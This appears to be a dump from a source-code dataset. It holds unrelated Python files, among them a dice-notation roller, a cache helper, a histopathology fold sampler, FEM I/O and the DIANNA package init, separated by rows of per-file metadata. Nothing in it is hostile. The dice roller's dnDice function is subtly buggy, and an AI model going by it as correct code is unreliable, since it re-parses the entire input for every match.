identity = tf.pad(identity,
[[0, 0], [0, 0], [0, 0], [ch, ch]])
in_channels = self.out_channels
#resnet = resnet + identity
return resnet
| 34.182099
| 116
| 0.557562
| 1,131
| 11,075
| 5.312997
| 0.168877
| 0.033283
| 0.018306
| 0.029289
| 0.339324
| 0.300549
| 0.275254
| 0.275254
| 0.269096
| 0.269096
| 0
| 0.006302
| 0.340948
| 11,075
| 323
| 117
| 34.287926
| 0.816961
| 0.018781
| 0
| 0.3
| 0
| 0
| 0.066218
| 0
| 0
| 0
| 0
| 0
| 0.007692
| 1
| 0.080769
| false
| 0.003846
| 0.030769
| 0.003846
| 0.211538
| 0.003846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f9c0eee8a8c52481a3d1792850e6310a0a8163
| 1,984
|
py
|
Python
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 421
|
2015-06-02T16:29:59.000Z
|
2021-06-03T18:44:42.000Z
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 404
|
2015-06-02T20:23:42.000Z
|
2019-08-21T16:59:41.000Z
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 16
|
2015-06-16T17:21:02.000Z
|
2020-03-27T02:27:09.000Z
|
from ..testcases import DustyTestCase
from dusty.warnings import Warnings
class TestWarnings(DustyTestCase):
def setUp(self):
super(TestWarnings, self).setUp()
self.warnings = Warnings()
def test_warn(self):
message_1 = 'Something is wrong, yo'
message_2 = 'Yo this thing is also wrong'
self.warnings.warn('test', message_1)
self.assertItemsEqual(self.warnings._stored, {'test': [message_1]})
self.warnings.warn('test', message_2)
self.assertItemsEqual(self.warnings._stored, {'test': [message_1, message_2]})
def test_has_warnings(self):
self.assertFalse(self.warnings.has_warnings)
self.warnings.warn('test', 'yo')
self.assertTrue(self.warnings.has_warnings)
def test_pretty_with_no_warnings(self):
self.assertEqual(self.warnings.pretty(), "")
def test_pretty(self):
message_1 = 'Something is wrong, yo'
message_2 = 'Something is very wrong, and that something takes way more than 80 characters to communicate the fact that it is wrong'
self.warnings.warn('test', message_1)
self.warnings.warn('test', message_2)
self.assertEqual(self.warnings.pretty(), "WARNING (test): Something is wrong, yo\nWARNING (test): Something is very wrong, and that something takes way more than 80 characters to\ncommunicate the fact that it is wrong\n")
def test_clear_namespace(self):
self.warnings.warn('test', 'Something is wrong, yo')
self.assertEqual(len(self.warnings._stored['test']), 1)
self.warnings.clear_namespace('test')
self.assertEqual(len(self.warnings._stored['test']), 0)
def test_clear_namespace_leaves_others_unaffected(self):
self.warnings.warn('test', 'Something is wrong, yo')
self.assertEqual(len(self.warnings._stored['test']), 1)
self.warnings.clear_namespace('some-other-namespace')
self.assertEqual(len(self.warnings._stored['test']), 1)
| 45.090909
| 229
| 0.689516
| 257
| 1,984
| 5.182879
| 0.233463
| 0.18018
| 0.084084
| 0.105105
| 0.63964
| 0.576577
| 0.5503
| 0.52027
| 0.385886
| 0.328829
| 0
| 0.011823
| 0.19002
| 1,984
| 43
| 230
| 46.139535
| 0.81705
| 0
| 0
| 0.314286
| 0
| 0.057143
| 0.245968
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 1
| 0.2
| false
| 0
| 0.057143
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1fa3f6469623ef44f7b253d9c5da8307b330081
| 4,655
|
py
|
Python
|
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
from random import randint
import re
# Supported formats:
# [A]dX[(L|H|K)n][.Y1[.Y2[...]]]
# A - number of dice
# X - number of sides of dice
# . - operation: allowed are + - * x /
# Ln/Hn/Kn - discard the Lowest n dice or Keep the Highest n dice. - will only apply the first of these, in order LHK
# Y1,Y2,... - operand
# warning: doesn't respect order of operations. So +5*3 will first add 5, then multiply by 3.
# example: 4d6+3 rolls 4 dice with 6 faces each, afterwards adds 3.
# Thanks to tara, maximum number of allowed dice/faces is 999.
# Parse a single dice roll
def randomDice(dice):
try:
# Format for the whole roll
diceexp = re.compile('(?:\D+)?(\d{0,3})d(\d{1,3})((([\+\-\*x\/LH])(\d+))+)?',re.IGNORECASE)
# Format for modifiers
addsexp = re.compile('[\+\-\*x\/LH]\d+',re.IGNORECASE)
numexp = re.compile('(\d+)')
m = diceexp.match(dice)
# Result of rolls
result = 0
rolls = []
# Weird input?
if not m:
return 0
# Get the number of dice to roll
dicenum = 0
if m.group(1) == "" or m.group(1) == None:
dicenum = 1
else:
dicenum = int(m.group(1))
# Get the number of faces on each dice
facenum = int(m.group(2))
# Roll the dice
for i in range(dicenum):
rolls.append(randint(1,facenum))
# result += randint(1,facenum)
# sort the rolls for further processing
rolls.sort()
if 'l' in dice.lower():
index = dice.lower().find('l') + 1
number = int(numexp.match(dice[index:]).group())
# Can't drop more dice than available, drop all of them
if number > dicenum:
return 0
for i in range(number,len(rolls)):
result += rolls[i]
elif 'h' in dice.lower():
index = dice.lower().find('h') + 1
number = int(numexp.match(dice[index:]).group())
# Can't keep more dice than available, keeping all of them
if number > dicenum:
number = dicenum
for i in range(len(rolls)-number,len(rolls)):
result += rolls[i]
elif 'k' in dice.lower():
index = dice.lower().find('k') + 1
number = int(numexp.match(dice[index:]).group())
# Can't keep more dice than available, keeping all of them
if number > dicenum:
number = dicenum
for i in range(len(rolls)-number,len(rolls)):
result += rolls[i]
else:
for i in range(len(rolls)):
result += rolls[i]
# Any modifiers present?
if not m.group(3) == None:
# Split them up
n = addsexp.findall(m.group(3))
# Modifiers
for i in range(len(n)):
# Value of modifier
modval = int(n[i][1:])
# Type of modifier
if n[i][0] == '+':
result += modval
elif n[i][0] == '-':
result -= modval
elif n[i][0] in '*x':
result *= modval
elif n[i][0] == '/':
result /= modval
return result
except:
return None
# Parse a whole expression.
#
# Format: dice1[+dice2[+dice3[...]]]
# dice1, dice2, dice3, ...: Any valid dice format as written in the randomDice function.
#
# Returns: The total of all rolls as integer, None if there was no valid dice notation found
def dnDice(dice):
# Pattern
diceexp1 = re.compile('(\d{0,3}d\d{1,3})(([\+\-\*x\/HLK]\d+(?!d))+)?', re.IGNORECASE)
# Total roll
total = 0
results = diceexp1.findall(dice)
if len(results) == 0:
return None
else:
# Total up the rolls
for d in results:
string = ""
# Discard the last part of the matched expression, it's a weird duplicate, join the rest together (the modifiers get split off)
for part in dice:
string += part
t = randomDice(string)
if t == None:
return None
else:
try:
total += randomDice(string)
except:
return None
return total
| 34.738806
| 140
| 0.478195
| 566
| 4,655
| 3.932862
| 0.293286
| 0.016173
| 0.016173
| 0.02965
| 0.293801
| 0.268194
| 0.248877
| 0.194519
| 0.173405
| 0.154987
| 0
| 0.020166
| 0.403437
| 4,655
| 133
| 141
| 35
| 0.781419
| 0.299033
| 0
| 0.35
| 0
| 0.025
| 0.042058
| 0.031705
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| false
| 0
| 0.025
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1fbbda465699c148d64aca8b6b9736f618761e2
| 2,471
|
py
|
Python
|
cfg/configure_model.py
|
dadelani/sentiment-discovery
|
0cbfc5f6345dacbf52f1f806a9e136a61ca35cf8
|
[
"BSD-3-Clause"
] | 2
|
2019-04-24T08:23:54.000Z
|
2020-06-24T10:25:34.000Z
|
cfg/configure_model.py
|
mikekestemont/sentiment-discovery
|
84bf39846ddf6b099d99318214a013269b5b0e61
|
[
"BSD-3-Clause"
] | null | null | null |
cfg/configure_model.py
|
mikekestemont/sentiment-discovery
|
84bf39846ddf6b099d99318214a013269b5b0e61
|
[
"BSD-3-Clause"
] | 1
|
2019-03-23T08:07:33.000Z
|
2019-03-23T08:07:33.000Z
|
import os
from sentiment_discovery.reparameterization import remove_weight_norm
from sentiment_discovery.model import make_model
class ModuleConfig(object):
def __init__(self, parser):
super(ModuleConfig, self).__init__()
self.parser = parser
def apply(self, cfg, opt):
"""make model and format model path for reloading parameters"""
print('configuring model')
cell_type = opt.rnn_type
num_layers = opt.layers
embed_size = opt.embed_size
hidden_size = opt.rnn_size
# set in configure_data
data_size = opt.data_size
dropout = opt.dropout
w_norm = opt.weight_norm
lstm_only = opt.lstm_only
saved_path = ''
if opt.load_model != '':
model_dir = cfg.logger.get_log_dir(opt.model_dir)
saved_path = os.path.join(model_dir, opt.load_model)
print(embed_size)
model, recurrent_module, embedder_module, chkpt = make_model(
cell_type=cell_type, num_layers=num_layers,
embed_size=embed_size, hidden_size=hidden_size,
data_size=data_size, dropout=dropout, weight_norm=w_norm,
lstm_only=lstm_only, saved_path=saved_path)
cfg.model = model
cfg.chkpt = chkpt
nParams = sum([p.nelement() for p in cfg.model.parameters()])
print('* number of parameters: %d' % nParams)
def configure_model(parser):
"""add cmdline args for configuring models"""
parser.add_argument('-load_model', default='',
help="""a specific checkpoint file to load from experiment's model directory""")
parser.add_argument('-should_test', action='store_true',
help='whether to train or evaluate a model')
parser.add_argument('-model_dir', default='model',
help='directory where models are saved to/loaded from')
parser.add_argument('-rnn_type', default='mlstm',
help='mlstm, lstm or gru')
parser.add_argument('-layers', type=int, default=1,
help='Number of layers in the rnn')
parser.add_argument('-rnn_size', type=int, default=4096,
help='Size of hidden states')
parser.add_argument('-embed_size', type=int, default=64,
help='Size of embeddings')
parser.add_argument('-weight_norm', action='store_true',
help='whether to use weight normalization for training NNs')
parser.add_argument('-lstm_only', action='store_true',
help='if `-weight_norm` is applied to the model, apply it to the lstm parmeters only')
parser.add_argument('-dropout', type=float, default=0.1,
help='Dropout probability.')
return ModuleConfig(parser)
| 39.854839
| 93
| 0.718737
| 352
| 2,471
| 4.821023
| 0.321023
| 0.058338
| 0.100177
| 0.033589
| 0.032999
| 0.032999
| 0
| 0
| 0
| 0
| 0
| 0.004369
| 0.166329
| 2,471
| 61
| 94
| 40.508197
| 0.819417
| 0.048563
| 0
| 0
| 0
| 0
| 0.248793
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0
| 0.056604
| 0
| 0.150943
| 0.056604
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1ff198ad462185fb2910c252e87000aebf824f5
| 6,351
|
py
|
Python
|
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | 2
|
2021-01-11T20:09:32.000Z
|
2021-05-14T14:52:48.000Z
|
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | null | null | null |
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | null | null | null |
from os import listdir, remove, makedirs
from os.path import isfile, join, exists
import shutil
import joblib
from termcolor import cprint
import json
from pathlib import Path
_cache_path = None
_log_actions = True
def init(cache_path, log_actions=True):
"""
Initializes the cache.
Keyword Arguments:
- cache_path: directory where cached files are saved
- log_actions: when true, all actions are logged
"""
global _cache_path, _log_actions
_log_actions = log_actions
_cache_path = cache_path
try:
if not exists(cache_path):
makedirs(cache_path)
except Exception as e:
cprint(e, 'red')
def write(filename, data):
"""
Pickles a file and writes it to the cache.
Keyword Arguments:
- filename: name of the file to write to
- data: object to cache
"""
if _log_actions:
cprint('Writing to cache: "{}"'.format(filename), 'green')
joblib.dump(data, join(_cache_path, filename))
def write_plain(filename, data, add_extension=True):
"""
Simply writes the textual data to a file.
"""
if _log_actions:
cprint('Writing to cache (plain): "{}"'.format(filename), 'green')
if add_extension:
filename += '.json'
with open(join(_cache_path, filename), 'w') as f:
f.write(data)
def write_dict_json(filename, data, add_extension=True):
"""
Writes a dictionary to file using JSON format.
"""
if _log_actions:
cprint('Writing to cache (json): "{}"'.format(filename), 'green')
json_string = json.dumps(data, sort_keys=False, indent=4)
if add_extension:
filename += '.json'
with open(join(_cache_path, filename), 'w') as f:
f.write(json_string)
def read(filename):
"""
Reads a file from the cache and unpickles it.
Keyword Arguments:
- filename: name of the file to read
Returns:
- data: unpickled object
"""
if _log_actions:
cprint('Loading from cache: "{}"'.format(filename), 'green')
return joblib.load(join(_cache_path, filename))
def read_multiple(filenames):
"""
Reads multiple file from the cache and unpickles them.
Keyword Arguments:
- filenames: names of the files to read
Returns:
- result: unpickled object
- success_files: list of successful filenames
- errors: filenames for which exceptions happened
"""
result = []
success_files = []
errors = []
for f in filenames:
try:
result.append(read(f))
success_files.append(f)
except Exception as e:
cprint(f'Loading {f} failed!', 'red')
cprint(e, 'red')
errors.append(f)
return result, success_files, errors
def read_plain(filename):
"""
Reads a file from the cache and unpickles it.
Keyword Arguments:
- filename: name of the file to read
Returns:
- data: unpickled object
"""
if _log_actions:
cprint('Loading from cache: "{}"'.format(filename), 'green')
return Path(join(_cache_path, filename)).read_text()
def delete(filename):
"""
Removes all files from the cache that have names starting with filename.
"""
deleted = 0
errors = 0
for f in entries():
try:
if f.startswith(filename):
remove(join(_cache_path, f))
deleted += 1
except:
cprint(f'Cannot remove from cache: {filename}', 'red')
errors += 1
cprint(f'Removed from cache all files starting with {filename}', 'green')
msg = f'Removed {deleted} files, {errors} errors'
cprint(msg, 'yellow')
return {
'type': 'success' if errors == 0 else 'error',
'msg': msg
}
def delete_all_clf_projs():
"""
Deletes all classifier projections
"""
deleted = 0
errors = 0
for f in entries():
try:
if '__clf_proj_' in f:
remove(join(_cache_path, f))
deleted += 1
except:
cprint(f'Cannot remove from cache: {f}', 'red')
errors += 1
cprint(f'Removed from cache all classifier projections', 'green')
msg = f'Removed {deleted} files, {errors} errors'
cprint(msg, 'yellow')
return {
'type': 'success' if errors == 0 else 'error',
'msg': msg
}
def clear():
"""
Deletes the cache.
"""
cprint('Clearing cache', 'yellow')
shutil.rmtree(_cache_path, ignore_errors=True)
def entries():
"""
Lists all files in the cache.
Returns:
- list of all file names in the cache directory
"""
return [f for f in listdir(_cache_path) if isfile(join(_cache_path, f))]
def content():
"""
Returns all .json files in the cache to allow showing what
classifiers etc. have been trained so far.
Returns:
- a dictionary containing all files' contents
"""
cached_files = entries()
json_files = [f for f in cached_files if f.endswith('_args.json')]
datasets = []
classifiers = []
projections = []
classifier_projections = []
for f in json_files:
try:
filepath = join(_cache_path, f)
contents = Path(filepath).read_text()
json_dict = {
'file': f,
'args': json.loads(contents)
}
if '__proj_' in f:
projections.append(json_dict)
elif '__clf_proj_' in f:
classifier_projections.append(json_dict)
elif '__clf_' in f:
# send scores for cached classifications
score_file = f.replace('_args.json', '_scores.json')
scores = Path(join(_cache_path, score_file)).read_text()
json_dict['scores'] = json.loads(scores)
classifiers.append(json_dict)
elif f.startswith('data_'):
datasets.append(json_dict)
except Exception as e:
cprint(
f'Error: Some related files may be missing for file {f}, check if you copied files correctly or run you jobs again!', 'red')
cprint(e, 'red')
return {
'datasets': datasets,
'classifiers': classifiers,
'projections': projections,
'classifier_projections': classifier_projections
}
| 26.352697
| 140
| 0.597859
| 767
| 6,351
| 4.805737
| 0.221643
| 0.048833
| 0.035269
| 0.024417
| 0.363266
| 0.32854
| 0.290016
| 0.263972
| 0.253391
| 0.233858
| 0
| 0.002462
| 0.296489
| 6,351
| 240
| 141
| 26.4625
| 0.822516
| 0.204377
| 0
| 0.362963
| 0
| 0.007407
| 0.163453
| 0.00461
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088889
| false
| 0
| 0.051852
| 0
| 0.192593
| 0.133333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b00a8aae5f5c462bd8742df1743968940cbb675
| 8,123
|
py
|
Python
|
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | null | null | null |
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | null | null | null |
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | 1
|
2021-04-20T04:37:47.000Z
|
2021-04-20T04:37:47.000Z
|
import torch
import os
import numpy as np
import random
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from data.tileimages import *
from data.multitask import *
import fastai
from fastai.vision import *
class FoldSampler:
def __init__(self, TRAIN, LABELS,
mean, std, N,
tfms=[], sz=128,bs=16,
n_folds=4, uniform_augmentations=False,
shuffle_nonempty_imgs=False,
model_name=None,
is_train=True,
is_ordinal=False,
SEED=2020,
num_workers=4):
self._seed_everything(SEED)
self.SEED = SEED
self.tfms = tfms
self.mean = mean
self.std = std
self.N = N
self.nfolds = n_folds
self.TRAIN = TRAIN
self.sz = sz
self.bs = bs
self.is_ordinal = is_ordinal
self.is_train=is_train
self.num_workers=num_workers
self.model_name = model_name
self.uniform_augmentations = uniform_augmentations
self.shuffle_nonempty_imgs = shuffle_nonempty_imgs
self._prepare_data(TRAIN, LABELS)
self.df.head()
def _seed_everything(self, seed):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = True
def _cats4slide(self, image_id):
fn_cats = os.path.join(self.TRAIN, f'{image_id}_mask.txt')
if os.path.isfile(fn_cats):
with open(fn_cats) as f:
return [int(int(l)>1) for l in f.readlines()]
else:
raise Exception("File not found", str(fn_cats))
def _findAllReplicates(self, pairs, seed):
replicates = [seed]
nodes = [seed]
def addReplicate(n):
if n not in replicates:
replicates.append(n)
nodes.append(n)
# while there are nodes left
while len(nodes) > 0:
this_node = nodes[0]
for i,j in pairs:
if i==this_node:
# match - add j to replicates
addReplicate(j)
elif j==this_node:
# match - add i to replicates
addReplicate(i)
nodes.pop(0)
return replicates
def _pairs2sameFolds(self, df,pairs):
replicate_indices = np.unique(pairs)
split_values = df.split.values
for ind in replicate_indices:
allReps = self._findAllReplicates(list(pairs), ind)
# set all to the same fold as the minimum index
min_rep = min(allReps)
target_fold = split_values[min_rep]
for rep in allReps:
split_values[rep] = target_fold
df.split = split_values
return df
def _prepare_data(self, TRAIN, LABELS):
df = pd.read_csv(LABELS).set_index('image_id')
files = set([p[:32] for p in os.listdir(TRAIN)])
df = df.loc[files]
df = df.reset_index()
df['stratify'] = df.data_provider.map(str) + '-' + df.isup_grade.map(str)
splits = StratifiedKFold(n_splits=self.nfolds, random_state=self.SEED, shuffle=True)
splits = list(splits.split(df,df.stratify))
folds_splits = np.zeros(len(df)).astype(np.int)
for i in range(self.nfolds): folds_splits[splits[i][1]] = i
df['split'] = folds_splits
if self.is_ordinal:
def _transform_ordinal(label):
#return ','.join([str(i) for i in range(int(label) + 1)])
return ','.join([str(i) for i in range(int(label))])
df.isup_grade = df.isup_grade.apply(_transform_ordinal)
# add tile cancer categories if present in train data
if self.model_name in ["multihead_tilecat", "multihead_tilecat_attention"]:
cancer_labels = np.array([np.array(self._cats4slide(image_id)) for image_id in df.image_id.values])
for i in range(cancer_labels.shape[1]):
df[f'cancer_status_{i}'] = list(cancer_labels[:,i])
# set serial section replicates to same folds
pairs_fn = os.path.join('../','pair_indices.npy')
if os.path.exists(pairs_fn):
pairs = np.load(pairs_fn)
print(f'Setting {np.array(pairs).shape[0]} serial section replicates to same folds')
df = self._pairs2sameFolds(df, pairs)
self.df = df
def get_data(self,fold=0, **kwargs):
model_name = "iafoss" if self.model_name is None else self.model_name
regr = "regr" in model_name
def __MImageItemList():
""" This returns MImageItemList with specified defaults """
return MImageItemList.from_df(self.df,
path='.',
folder=self.TRAIN,
cols='image_id',
sz=self.sz,
N=self.N,
mean=self.mean,
std=self.std,
uniform_augmentations=self.uniform_augmentations,
shuffle_nonempty_imgs=self.shuffle_nonempty_imgs
)
if model_name in ["multihead_tilecat", "multihead_tilecat_attention"] and self.is_train:
# create isup LabelItemList
isup_labels = (
(__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade']))
)
# create the dict to hold all LabelItemLists
multitask_project = {
'isup': {
'label_lists': isup_labels,
}
}
# add tile cancer categories to the dict
for i in range(self.N):
tilecat = (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=[f'cancer_status_{i}']))
multitask_project[f'tilecat_{i}'] = {
'label_lists': tilecat,
}
ItemLists.label_from_mt_project = label_from_mt_project
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_mt_project(multitask_project)
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
else: # Defaults to Iafoss
if self.is_ordinal:
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade'], label_cls=None, label_delim=',')
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
else:
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade'], label_cls=FloatList if regr==True else None)
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
| 40.819095
| 111
| 0.519266
| 891
| 8,123
| 4.530864
| 0.225589
| 0.020808
| 0.023532
| 0.013624
| 0.232351
| 0.224919
| 0.208075
| 0.208075
| 0.182314
| 0.182314
| 0
| 0.005217
| 0.386434
| 8,123
| 198
| 112
| 41.025253
| 0.804775
| 0.056752
| 0
| 0.164706
| 0
| 0
| 0.050621
| 0.010464
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.058824
| 0.005882
| 0.170588
| 0.005882
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b02e549c87583bcf554b71f024544d0bb0dac0a
| 2,735
|
py
|
Python
|
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
import string
import scipy
import PslgIo, ElementAwarePslg
def loadEle(filename):
pslg = ElementAwarePslg.ElementAwarePslg()
file = open(filename, "r")
try:
PslgIo.readFromFile(file, pslg, filename)
finally:
file.close()
return pslg
def saveFem(filename, femResults):
#Open the file
file = open(filename, "w")
#Header
line = saveHeader(file, len(femResults), femResults[0][1].shape[0])
#Actual contents
try:
for solutionDesc in femResults:
saveResult(file, solutionDesc)
finally:
file.close()
return
def saveResult(file, solutionDesc):
file.write(str(solutionDesc[0]) + "\n")
for i in range(0, solutionDesc[1].shape[0]):
line = "%.12f" % solutionDesc[1][i,0]
file.write(line + "\n")
file.flush()
def saveRelease(file, releaseDesc):
file.write(str(releaseDesc[0]) + "\t" + str(releaseDesc[1]) + "\n")
file.flush()
def saveHeader(file, timeSteps, variableNumber):
line = str(timeSteps) + " " + str(variableNumber) + "\n"
file.write(line)
file.flush()
def loadFem(filename):
results = []
file = open(filename, "r")
try:
resultNumber, n = readHeader(file)
for i in range(0, resultNumber):
time = float(getLine(file))
z = []
for j in range(0, n):
currentZ = float(getLine(file))
z.append(currentZ)
results.append((time, z))
finally:
file.close()
return results
def loadLastFemresult(filename):
result = None
file = open(filename, "r")
try:
#Skip header
resultNumber, n = readHeader(file)
currentLine = getLine(file)
while len(currentLine) > 0:
#Get the current record
time = float(currentLine)
z = []
for j in range(0, n):
currentZ = float(getLine(file))
z.append(currentZ)
result = (time, z)
#Get next line
currentLine = getLine(file)
except:
pass
finally:
file.close()
if(result is not None):
return (result[0], scipy.array([result[1]]).transpose())
else:
return None
def readHeader(file):
headerLine = getLine(file)
if len(headerLine) > 0:
tokens = string.split(headerLine)
if len(tokens) != 2:
raise IOError("Invalid file format (header should contain exactly two positive integers)")
return (int(tokens[0]), int(tokens[1]))
else:
raise IOError("Invalid file format (header not found)")
def getLine(file):
return string.strip(file.readline())
| 27.35
| 102
| 0.571115
| 301
| 2,735
| 5.189369
| 0.30897
| 0.049296
| 0.040973
| 0.03265
| 0.166453
| 0.112676
| 0.067862
| 0.067862
| 0.067862
| 0.067862
| 0
| 0.012137
| 0.30713
| 2,735
| 100
| 103
| 27.35
| 0.812137
| 0.02925
| 0
| 0.395062
| 0
| 0
| 0.049434
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0.012346
| 0.037037
| 0.012346
| 0.234568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b04376d12aae979563b6b36b34ff0b76d2dcff0
| 3,466
|
py
|
Python
|
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
"""
DIANNA: Deep Insight And Neural Network Analysis.
Modern scientific challenges are often tackled with (Deep) Neural Networks (DNN).
Despite their high predictive accuracy, DNNs lack inherent explainability. Many DNN
users, especially scientists, do not harvest DNNs power because of lack of trust and
understanding of their working.
Meanwhile, the eXplainable AI (XAI) methods offer some post-hoc interpretability and
insight into the DNN reasoning. This is done by quantifying the relevance of individual
features (image pixels, words in text, etc.) with respect to the prediction. These
"relevance heatmaps" indicate how the network has reached its decision directly in the
input modality (images, text, speech etc.) of the data.
There are many Open Source Software (OSS) implementations of these methods, alas,
supporting a single DNN format and the libraries are known mostly by the AI experts.
The DIANNA library supports the best XAI methods in the context of scientific usage
providing their OSS implementation based on the ONNX standard and demonstrations on
benchmark datasets. Representing visually the captured knowledge by the AI system can
become a source of (scientific) insights.
See https://github.com/dianna-ai/dianna
"""
import logging
from onnx_tf.backend import prepare # To avoid Access Violation on Windows with SHAP
from . import methods
from . import utils
logging.getLogger(__name__).addHandler(logging.NullHandler())
__author__ = "DIANNA Team"
__email__ = "dianna-ai@esciencecenter.nl"
__version__ = "0.2.1"
def explain_image(model_or_function, input_data, method, labels=(1,), **kwargs):
"""
Explain an image (input_data) given a model and a chosen method.
Args:
model_or_function (callable or str): The function that runs the model to be explained _or_
the path to a ONNX model on disk.
input_data (np.ndarray): Image data to be explained
method (string): One of the supported methods: RISE, LIME or KernelSHAP
labels (tuple): Labels to be explained
Returns:
One heatmap (2D array) per class.
"""
explainer = _get_explainer(method, kwargs)
explain_image_kwargs = utils.get_kwargs_applicable_to_function(explainer.explain_image, kwargs)
return explainer.explain_image(model_or_function, input_data, labels, **explain_image_kwargs)
def explain_text(model_or_function, input_data, method, labels=(1,), **kwargs):
"""
Explain text (input_data) given a model and a chosen method.
Args:
model_or_function (callable or str): The function that runs the model to be explained _or_
the path to a ONNX model on disk.
input_data (string): Text to be explained
method (string): One of the supported methods: RISE or LIME
